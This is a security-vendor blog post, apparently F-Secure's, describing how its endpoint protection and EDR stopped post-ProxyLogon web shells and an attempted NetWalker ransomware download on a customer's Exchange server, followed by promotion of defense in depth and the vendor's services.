Company's solid mix of cyber security technologies prevents Microsoft Exchange data breach

The group of Microsoft Exchange vulnerabilities known as ProxyLogon has affected tens of thousands of companies with on-premise, internet-exposed Exchange servers. Even though Microsoft has announced that the majority of vulnerable servers are now patched, experts have warned that merely patching the vulnerabilities is not enough: Threat actors who have already gained access to servers could still be in the network.

F-Secure security consultant Antti Laatikainen predicted historic numbers of breach reports this spring due to the vulnerabilities, which have also caught the attention of ransomware threat actors. With Laatikainen asserting that the ease of access via ProxyLogon means the majority of vulnerable companies have been breached, many companies' best hope becomes that any attacker within their network will be swiftly detected.

Fortunately for one of our European customers, that's exactly what happened.

Foiling an attacker

In March, suspicious activity was detected in the network of a customer organization that uses our endpoint protection and endpoint protection and response (EDR) solutions. Because the activity was related to critical services, the customer wanted to be absolutely sure the incident was addressed properly. Rather than handle the incident internally, the organization opted to use our Elevate to F-Secure service option to escalate it to our security analysts.  

Upon investigation, our consultants found that between the 9th and the 18th of March, an attacker had made post-exploitation attempts to write hundreds of malicious files to our customer's Exchange server. Despite the attacker's best efforts, almost all of these files (web shells attackers use to gain persistent access to a web server) were blocked by our endpoint security solution, F-Secure Elements Endpoint Protection.  

A few of the web shells, however, went undetected. The attacker was able to use them to execute additional commands. In one instance, the attacker launched the command prompt and ran the "whoami" command to ensure that web shell control had been established. Our EDR solution, F-Secure Elements Endpoint Detection & Response, recognized the activity as abnormal and flagged it. 

In another instance, the attacker used a PowerShell command to try to download and install the NetWalker family of ransomware. DeepGuard, a proactive protection layer in our endpoint security that monitors for suspicious behavior from file processes, recognized the command action as malicious and blocked it. 

Once our consultants had gained an understanding of how the incident had played out, they were able to evict the attacker and remediate the issue for a painless and happy ending to the story. But without appropriate prevention and detection technologies in place, the incident could have been much worse.

A notorious strain of ransomware

The NetWalker ransomware has been used in attacks on colleges and universities, healthcare institutions, power providers, government agencies, manufacturing firms, and various other verticals. As stated by blockchain analysis company Chainalysis, the ransomware has infected at least 305 victims in 27 countries. 

Those hits have raked in the profits. Chainalysis reported in January that it had traced more than $46 million worth of funds in NetWalker ransoms since the malware's debut in August 2019. One of the victims, the University of California at San Francisco, paid $1.14 million to restore their data. 

Netwalker was also, according to one report, the ransomware family most engaged in leaking data throughout 2020. The group behind the malware exposed data stolen from 113 organizations between January 2020 and January 2021. 

Thwarting NetWalker saved our customer from both reputational and financial damages. Not only that, further investigation revealed that had the post-exploitation attempts been successful, the server would also have been co-opted into a cryptocurrency botnet called Prometei. 

Defense in depth works

The situation is a classic example of why organizations need defense in depth. Endpoint security and EDR were working together to protect our customer - and one without the other would not have been sufficient. 

Endpoint security proactively blocked hundreds of malicious web shells that were dropped, all before our customer even realized what was happening. And when a few managed to slip through, EDR was able to recognize the ensuing attacker activity as abnormal and register alerts. Endpoint security blocked the installation of ransomware. And EDR's event logging capabilities gave much-needed visibility into the incident for investigators, who used their seasoned expertise to understand what had happened and take appropriate action. 

Not to be forgotten is the importance of vulnerability management. A vulnerability scanning platform like F-Secure Elements Vulnerability Management will hone in on vulnerabilities and prioritize them so you can patch and minimize your attack surface. 

Finally, companies need skilled experts to make sense of the alerts and logs and know what to do next to protect the estate. F-Secure partners who don't possess these skills in-house can, like our European customer, have access to our security experts when they need them most. Purchasing security as a service means a whole team of world-class cyber security experts will always have your back. 

F-Secure Elements Endpoint Detection and Response displayed the full process chain of attacker activities

Fig 1: The attacker launched the command prompt and ran the "whoami" command.

Fig 2: F-Secure Elements EDR recognized the events as abnormal.

Fig 3: F-Secure Elements EDR showed the entire process chain, including the details of "whoami" and PowerShell commands.